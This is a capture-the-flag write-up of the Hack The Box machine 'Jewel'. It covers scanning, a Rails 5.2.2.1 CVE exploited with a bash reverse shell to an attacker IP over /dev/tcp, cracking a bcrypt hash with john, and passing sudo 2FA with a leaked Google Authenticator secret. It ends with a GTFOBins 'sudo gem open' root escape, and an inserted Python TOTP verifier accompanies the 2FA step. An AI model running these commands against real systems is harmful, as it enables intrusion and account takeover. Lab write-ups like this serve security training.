Jewel ~ Hack The Box
Prerequisite
To make life easier I usually add an entry to my hosts file so the target machine can be reached by name.
echo "10.10.10.211 jewel.htb" >> /etc/hosts

Okay now onto the hacking!
Reconnaissance
As always, I started off with an NMAP scan against the machine.
nmap -Pn -sC -sV -A -p- -oN initial jewel.htb
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 fd:80:8b:0c:73:93:d6:30:dc:ec:83:55:7c:9f:5d:12 (RSA)
| 256 61:99:05:76:54:07:92:ef:ee:34:cf:b7:3e:8a:05:c6 (ECDSA)
|_ 256 7c:6d:39:ca:e7:e8:9c:53:65:f7:e2:7e:c7:17:2d:c3 (ED25519)
8000/tcp open http Apache httpd 2.4.38
|_http-generator: gitweb/2.20.1 git/2.20.1
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported:CONNECTION
|_http-server-header: Apache/2.4.38 (Debian)
| http-title: jewel.htb Git
|_Requested resource was http://jewel.htb:8000/gitweb/
8080/tcp open http nginx 1.14.2 (Phusion Passenger 6.0.6)
|_http-favicon: Unknown favicon MD5: D41D8CD98F00B204E9800998ECF8427E
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: nginx/1.14.2 + Phusion Passenger 6.0.6
|_http-title: BL0G!
Scanning & Enumeration
The scan showed two web servers. Port 8000 is Apache serving gitweb, which exposes the application's source repository, and port 8080 is nginx with Phusion Passenger serving the blog itself (titled "BL0G!").

Enumerating the exposed repository revealed the framework the blog runs on and its pinned version:
- Rails 5.2.2.1
I was able to find an existing CVE for this version of Rails, along with a public PoC.
Exploitation
With the help of the PoC, I was able to gain a minimal shell on the remote box running Rails 5.2.2.1.

First I had to create an account on the blog running on port 8080; the exploit takes the target host and port, the account's email and username, and the command to run.

Once I had that account created, I was ready to run the exploit.

┌──(root💀kali)-[/home/…/boxes/htb/machines/jewel]
└─# python3 exploit.py 10.10.10.211 8080 [email protected] nee "bash -c 'bash -i >& /dev/tcp/10.10.14.47/666 0>&1'"

This gave me a stable shell as the unprivileged user account.
Privilege Escalation
For this, I utilised LinPEAS, as I always do! The privesc script returned a password hash belonging to bill:


[+] Searching specific hashes inside files - less false positives (limit 70)
/home/bill/blog/bd.sql:$2a$12$uhUssB8.HFpT4XpbhclQU.Oizufehl9qqKtmdxTXetojn2FcNncJW
The $2a$12$ prefix marks it as bcrypt with a cost factor of 12, so every guess is deliberately slow and a good wordlist matters. I headed off to crack the password with my trusty dictionary from SecLists and good ol' john!

┌──(root💀kali)-[/home/…/boxes/htb/machines/jewel]
└─# john password.hash -w=passwd.dict
After that, I tried to run sudo -l to see which binaries bill could run with elevated privileges.

However, I was hit with a 2FA verification-code prompt, which stopped the command from running. After looking around for a bit, I realised there was a .google_authenticator file in bill's home directory:

[email protected]:~$ cat .google_authenticator
2UQI3R52WFCLE6JTLDCSJYMJH4
" WINDOW_SIZE 17
" TOTP_AUTH
I then set up that secret in the authenticator app on my phone and was able to get it working!
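What the authenticator app on the phone is doing with that secret, as an added example (not code from the original writeup): the first line of the file is the base32 secret without padding, the `" WINDOW_SIZE 17` line tells pam_google_authenticator to accept the current 30-second code plus 8 steps on either side, and `" TOTP_AUTH` selects time-based rather than counter-based codes. The Python below parses that layout, decodes the secret and computes the RFC 6238 codes the PAM module would accept. The sample file text is constructed from the lines shown above; the timestamps used are arbitrary.

```python
"""RFC 6238 TOTP verifier for a Google Authenticator-style secret file.

Added example, not code from the writeup. It mirrors what the phone app
and pam_google_authenticator compute from the same ~/.google_authenticator
file: base32 secret on line 1, '" OPTION' lines, then scratch codes.
"""
import base64
import hashlib
import hmac
import struct
import time

# Constructed sample: same layout as the file shown in the writeup.
SAMPLE_FILE = """2UQI3R52WFCLE6JTLDCSJYMJH4
" WINDOW_SIZE 17
" TOTP_AUTH
"""

STEP = 30  # TOTP time step in seconds (pam_google_authenticator default)


def parse_google_authenticator(text):
    """Return (secret, options, scratch_codes) from a .google_authenticator file."""
    lines = [ln.rstrip() for ln in text.splitlines() if ln.strip()]
    secret = lines[0].strip()
    options = {}
    scratch = []
    for ln in lines[1:]:
        if ln.startswith('" '):
            parts = ln[2:].split(None, 1)
            # Options with no argument (e.g. TOTP_AUTH) are stored as True
            options[parts[0]] = parts[1] if len(parts) == 2 else True
        else:
            scratch.append(ln)
    return secret, options, scratch


def decode_secret(b32):
    """Base32-decode, re-adding the padding Google Authenticator omits."""
    b32 = b32.strip().upper()
    b32 += "=" * (-len(b32) % 8)
    return base64.b32decode(b32)


def hotp(key, counter, digits=6):
    """RFC 4226 HOTP: HMAC-SHA1 over the big-endian counter, then dynamic truncation."""
    msg = struct.pack(">Q", counter)
    mac = hmac.new(key, msg, hashlib.sha1).digest()
    offset = mac[-1] & 0x0F
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % (10 ** digits)).zfill(digits)


def totp(key, at=None, step=STEP, digits=6):
    """RFC 6238 TOTP: HOTP with the counter set to the current time step."""
    if at is None:
        at = time.time()
    return hotp(key, int(at) // step, digits)


def accepted_codes(key, at, window_size, step=STEP):
    """Codes valid for WINDOW_SIZE = window_size at time `at`:
    the current step plus (window_size - 1) // 2 steps on either side,
    which is how pam_google_authenticator interprets the option."""
    half = (window_size - 1) // 2
    centre = int(at) // step
    return [hotp(key, c) for c in range(centre - half, centre + half + 1)]


def verify(code, key, at, window_size):
    """True if `code` would be accepted at time `at` with the given window."""
    return code in accepted_codes(key, at, window_size)


def codes_from_file(text, at):
    """Parse the file and return every code accepted at time `at`."""
    secret, options, _ = parse_google_authenticator(text)
    window = int(options.get("WINDOW_SIZE", 3))  # 3 is the PAM module's default
    return accepted_codes(decode_secret(secret), at, window)


if __name__ == "__main__":
    # Print the 17 codes the server would currently accept for the sample secret.
    for c in codes_from_file(SAMPLE_FILE, time.time()):
        print(c)
```

A wide window like 17 exists to tolerate clock drift between server and phone, at the price of 17 guessable codes per attempt instead of 1; the clock of whatever generates the code still has to be within four minutes of the server's for the code to land inside that window.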

And finally, I was able to run sudo -l as bill without any issues.

Now that I knew bill could run gem with sudo, all that was left was to head to GTFOBins and get root. gem open launches $EDITOR on a gem's source, and -e lets you name that editor, so the "editor" here is simply a root shell:
sudo gem open -e "/bin/sh -c /bin/sh" rdoc

rooty!